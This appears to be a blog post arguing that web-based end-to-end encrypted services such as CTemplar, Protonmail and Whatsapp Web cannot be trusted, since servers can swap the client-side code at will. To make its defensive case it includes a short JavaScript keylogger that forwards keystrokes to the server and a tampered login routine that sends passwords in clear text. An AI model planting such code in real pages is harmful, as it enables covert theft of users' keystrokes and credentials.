A draft of some HTML extensions and one “browser rule” to secure web end-to-end encrypted communications

[Last edited on Friday, May the 20th, 2022, 07:30]

Nowadays there’s a huge security problem with webapps claiming to provide secure end-to-end encryption. The problem does not reside in end-to-end encryption itself: it can be secure enough for every kind of end user, when it is well implemented and its implementations are audited often enough by trustworthy third parties. The main and by far biggest problem with end-to-end encryption through webapps (that is, through web sites) currently resides in the fact that any webapp, with its client-side JavaScript code, is delivered to every user – that is you, me, anyone else – every time they open a “page” (a URL). This means there can be no effective auditing by trustworthy third parties to ensure that a webapp claiming to be secure does what it should and nothing it shouldn’t, since any malicious actor with access to the web server(s) it runs on could at any time change the code to steal any (possibly targeted) user’s supposedly client-side-only, secure data.


CTemplar, “the only really secure end-to-end encrypted webmail”, can’t be trusted (like any other)

It’s silly.
CTemplar is a recent player in the “secure end-to-end encrypted webmail” field.
They claim: «Our mission is to provide an anonymous E2EE (End to End Encrypted) email. No one except you and your recipient can read the contents of your emails, not even us» (archived).
They also claim: «In November of 2018, Professor Kobeissi revealed that if JavaScript is required for encryption, it can also be used to hack users who use end-to-end encrypted email services. How Did We Solve This With Checksums? The checksums, released on GitHub after every update, allows our users to quickly compare the code served to their browser, with the code hosted on GitHub within 15-30 seconds. Usually, comparing code can take hours or days. With checksums, you can do it in seconds» (archived; you can read Kobeissi’s findings here).
They give instructions about how to “quickly compare the code served to their [the users’] browser, with the code hosted on GitHub within 15-30 seconds” here (archived).
But the fact is: every user would have to spend those “15-30 seconds” (it took me at least a minute when I tried) every time they access any URL serving the CTemplar webmail service on https://mail.ctemplar.com/, only to perhaps feel confident (and not actually be certain: see below) that the JavaScript code running in their browser is the same as the code published on GitHub – which is evidently totally impractical for anyone.
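To get a feel for what that comparison involves, here is a minimal sketch of what it boils down to, run in the browser’s developer console: fetch one of the JavaScript files the server actually delivered, hash it, and compare the result by hand with the checksum published on GitHub. The file name is taken from CTemplar’s page; everything else is illustrative and is not their actual procedure.

```javascript
// Minimal sketch: hash one file the server actually served, then compare the
// result by eye with the checksum published on GitHub. Not CTemplar's own
// procedure; just what the comparison boils down to.
const response = await fetch('/browser-compatibility.js');
const bytes = await response.arrayBuffer();
const digest = await crypto.subtle.digest('SHA-256', bytes);
const hex = [...new Uint8Array(digest)]
  .map(b => b.toString(16).padStart(2, '0'))
  .join('');
console.log(hex); // manually compare with the published checksum
```

And this would have to be repeated for every sourced file, on every page load, because the next response from the server may be different.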
And the fact is: when I tried, the login page of their webmail service (archived) was not the same as the login page they published on GitHub (archived): it sourced some additional JavaScript code at the end.

CTemplar login page source

And the fact is: even had it been the same, I still could not have been certain that the JavaScript code running in my browser was the same as the code published on GitHub, since, for example, the browser-compatibility.js file (among the many other files that index.html sourced) had two integrity checksums.

CTemplar login page source (2)

The checksum of the browser-compatibility.js file published on GitHub did match the first checksum specified in the integrity attribute for browser-compatibility.js on the page I got from the server, but I could just as well have received a different, unknown browser-compatibility.js that is not published on GitHub and that matches the second checksum (the problem here is that SRI allows specifying more than one checksum for a given file).
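For illustration, this is roughly what such a script tag looks like (the hash values here are placeholders, not CTemplar’s real ones): Subresource Integrity lets a page list several hashes in one integrity attribute, and the browser accepts the file if it matches any of them.

```html
<!-- Illustrative only: placeholder hashes, not CTemplar's real values.
     With two hashes listed, a file matching EITHER one passes the check. -->
<script src="browser-compatibility.js"
        integrity="sha384-hashOfTheFilePublishedOnGithub
                   sha384-hashOfSomeOtherUnknownFile"
        crossorigin="anonymous"></script>
```

So the integrity attribute, used this way, proves nothing to the user: a second, unpublished version of the file would pass the browser’s check just as well.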
What does this all mean?
It means, and confirms, that services offering end-to-end encryption through web sites can’t be trusted.

Services offering end-to-end encryption through web sites can’t be trusted

A false sense of security is worse than no security at all

[Last modified on Tuesday, June 14, 2022, 14:54: added a paragraph summarizing the problem at the beginning of the first imaginary reply]

Whatsapp, Telegram, Element/Matrix, Protonmail and Tutanota are just the best-known and most widely used of the many services offering end-to-end encryption not only through their apps, but also through their web sites.

Can users of these web sites be confident that the people behind these web sites’ servers can’t read their “end-to-end encrypted” contents?

No, they can’t.
Not because end-to-end encryption itself is not secure (it can be), but because the delivery model of web apps, and in particular of their client-side code (i.e. the code that will be executed on the user’s device), is incompatible with security: on the server side, the client-side code that will be executed on the user’s device can be changed at any time by anyone with access to the server(s), with very little probability of anyone noticing (not the users, still less a “targeted” user, and still less any “third parties”).
This is no mystery: anyone with some knowledge of how a browser works knows it. And it’s not even much of a problem (arguably, but this is my opinion) when users trust their web app providers and don’t need to trust that their data are inaccessible to anyone, including the providers themselves and, in general, the people on the server side. It is a problem, though, when users do need to be sure of this, and it’s even more of a problem when the service owners tell them that this is the case: that nobody, not even the providers and the people on the server side, can access users’ data, while that’s just not true with web apps.
First, let’s get rid of one possible misconception: HTTPS does not make your contents unreadable to the people behind these (or any other) web sites’ servers; it only gives you, and them, reasonably good protection against anyone else who may try to read your contents on the path between your device and the web site’s servers.
Now, to the point, let’s take an example. User John logs into web.whatsapp.com and starts typing a message to his friend Bob, trusting Whatsapp’s claim that whatever he sends through Whatsapp’s servers will be readable only by Bob and nobody else, not even the people at Whatsapp, since it is always end-to-end encrypted. Jimmy, an admin at web.whatsapp.com, could have configured the servers so that the web “page” John is using includes a little JavaScript key-logging function that sends whatever John types to Whatsapp’s servers, unencrypted; and Jimmy could have done that just for John, and just for a few hours.
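To make the scenario concrete, here is a minimal sketch of what such an injected snippet could look like (the endpoint and field names are invented for illustration; this is not Whatsapp’s code):

```javascript
// Illustrative sketch only: a few lines appended to the page served to one
// specific user, forwarding every keystroke outside the end-to-end encrypted
// channel. The endpoint and field names are made up.
document.addEventListener('keydown', (event) => {
  navigator.sendBeacon('/collect-metrics', JSON.stringify({
    user: 'john',        // the server already knows whom it served this page to
    key: event.key,
    when: Date.now()
  }));
});
```

A dozen lines like these, served once to a single user for a few hours and then removed, would be practically impossible for that user, or for any auditor, to catch.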

Is there something John can do, when using web sites offering end-to-end encryption, to be sure the people behind the servers actually won’t read what they are not meant to read?

In order to be sure of that, John would have to read the entire content his browser receives on each “page” (URL) access and understand what its client-side code actually does, which is totally impractical for anyone.

Could Jimmy-the-admin get to know John’s password too?

If Jimmy worked for Element/Matrix, Protonmail or Tutanota, I’m sure he could, since all these providers’ web sites have a login page with a password field. Their login pages usually include JavaScript code that, when a user logs in, hashes the user’s password and sends only the hash to the provider’s servers; when this is the case, the people behind these web sites’ servers indeed cannot learn their users’ passwords. But at any time those same people can omit the password-hashing JavaScript code from any (possibly “targeted”) user’s login page, or serve the usual password-hashing code with just a few changes that make it do nothing at all; this way they can receive any user’s password in clear text.
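As a sketch of the idea (the function names, endpoint and hashing scheme are all invented; real providers use their own, more elaborate schemes), compare a login routine that hashes the password in the browser with a tampered one that simply doesn’t:

```javascript
// Illustrative sketch; endpoint, field names and hashing scheme are invented.

// What the legitimate login page is supposed to do: hash the password
// client-side, so the server never sees it in clear text.
async function legitimateLogin(username, password) {
  const digest = await crypto.subtle.digest(
    'SHA-256', new TextEncoder().encode(password));
  const hashed = btoa(String.fromCharCode(...new Uint8Array(digest)));
  await fetch('/api/login', {
    method: 'POST',
    body: JSON.stringify({ username, password: hashed }),
  });
}

// What a quietly tampered login page could do instead: skip the hashing, so
// the clear-text password reaches the server (still inside TLS, so the user
// sees nothing unusual).
async function tamperedLogin(username, password) {
  await fetch('/api/login', {
    method: 'POST',
    body: JSON.stringify({ username, password }),
  });
}
```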

What can they do, once they get to know a user’s password, say John’s password?

Once they know John’s password, without any further “tricks”, they can decrypt John’s private key, which, if John has used one of these web sites even just once, has been stored on their servers (this is openly the case with Protonmail, see https://security.stackexchange.com/a/58552; the page is archived here: https://archive.is/GQUf3; I’m almost certain it is also the case with Element/Matrix, Tutanota and every other provider that offers end-to-end encryption through its web site without requiring users to pick a local file containing the private key each time it is needed). Once they have decrypted John’s private key, they can save it unencrypted on their side and, from that very moment: they can read any encrypted content John received that is still on their servers; they can read any encrypted content John will receive; they can read any encrypted content John has sent that is still on their servers, if John encrypted it with his own public key as well as with his recipients’ keys (which is common practice); and they can read any encrypted content John will send, if John encrypts it with his own public key too. From that very moment they can do all of this not only when John is using their web sites, but also when he is using their applications, because any content John receives or sends, even through their applications, always passes through their servers. Last but not least, they can also send encrypted and/or signed contents on John’s behalf.
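As a rough sketch of why knowing the password is enough (the storage format, KDF parameters and function name are my assumptions, not any provider’s actual scheme): if the private key is stored on the servers encrypted with a key derived from the user’s password, then anyone who learns the password can derive the same key and decrypt it, for example with the standard Web Crypto API.

```javascript
// Illustrative sketch: assumes the stored blob is { salt, iv, ciphertext },
// with the private key encrypted under a password-derived AES key. Actual
// formats and KDF parameters differ from provider to provider.
async function unlockPrivateKey(password, stored) {
  const baseKey = await crypto.subtle.importKey(
    'raw', new TextEncoder().encode(password), 'PBKDF2', false, ['deriveKey']);
  const aesKey = await crypto.subtle.deriveKey(
    { name: 'PBKDF2', salt: stored.salt, iterations: 100000, hash: 'SHA-256' },
    baseKey,
    { name: 'AES-GCM', length: 256 },
    false,
    ['decrypt']);
  // Nothing in this computation requires the user's device: whoever holds the
  // stored blob and learns the password can run it anywhere.
  const privateKeyBytes = await crypto.subtle.decrypt(
    { name: 'AES-GCM', iv: stored.iv }, aesKey, stored.ciphertext);
  return new Uint8Array(privateKeyBytes);
}
```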
I’m also sure that even the people behind the servers at Whatsapp, Telegram, and any other provider whose web site uses a login method that does not require a password can learn, on each login (authentication) John performs on their web sites, some “secret” of John’s that allows them to unlock his private key, since in any case they need to unlock it without requiring John to pick a file containing his private key every time it is needed; and in any case, as I wrote above, they can read what he is writing (and what other “targeted” friends of John’s are writing, too) with a simple JavaScript keylogger.

Do you think these security issues have been exploited yet?

I can’t be sure, of course, but there are many suspicious cases: see here and here, for example. In those cases, involving Telegram and Protonmail, it is neither clear nor explained whether Telegram and Protonmail handed the authorities only users’ metadata or also users’ data (the contents of their conversations); but they certainly could have, in spite of what the already linked Wikipedia page currently says: it is simply not true, today, that «Due to the encryption utilized, Proton Mail is unable to hand over the contents of encrypted emails under any circumstances», just as it is not true for any other service offering end-to-end encryption through its web site.

[Update: I wrote a post showing how end-to-end encryption could safely be implemented in web browsers]

[Update: CTemplar has the same issues, but blows more smoke in our eyes]

[I wrote this post in the form of a dialogue, using imaginary male characters, for the sake of comprehensibility and readability]

[My advice to anyone who wants or needs to do instant messaging with trustworthy end-to-end encryption, that is, with privacy, is to use Briar, XMPP with OMEMO, or Signal. For trustworthy e-mail end-to-end encryption on the desktop I suggest using Claws Mail with its PGP plugins relying on GnuPG; there may be other trustworthy desktop e-mail clients (you can see here, although I don’t trust that page’s suggestions; more on this below), but I have not tested them. For trustworthy e-mail end-to-end encryption on Android I suggest using K-9 Mail or FairEmail, although they both rely on OpenKeychain for encryption: OpenKeychain is a good project, but sadly it has not been actively developed since 2018. Again: there may be others, but I have not tested them, and I don’t trust openpgp.org’s suggestions, since they state that «No security audits have been done by us and, thus, we cannot provide any security guarantees» and also because, regarding webmail “clients” like Protonmail, Tutanota, etc., they only state a mild «some people don’t consider these “end-to-end secure”», while they have every means to understand, and could and should declare, that services offering end-to-end encryption through web sites pose a huge security threat to their users]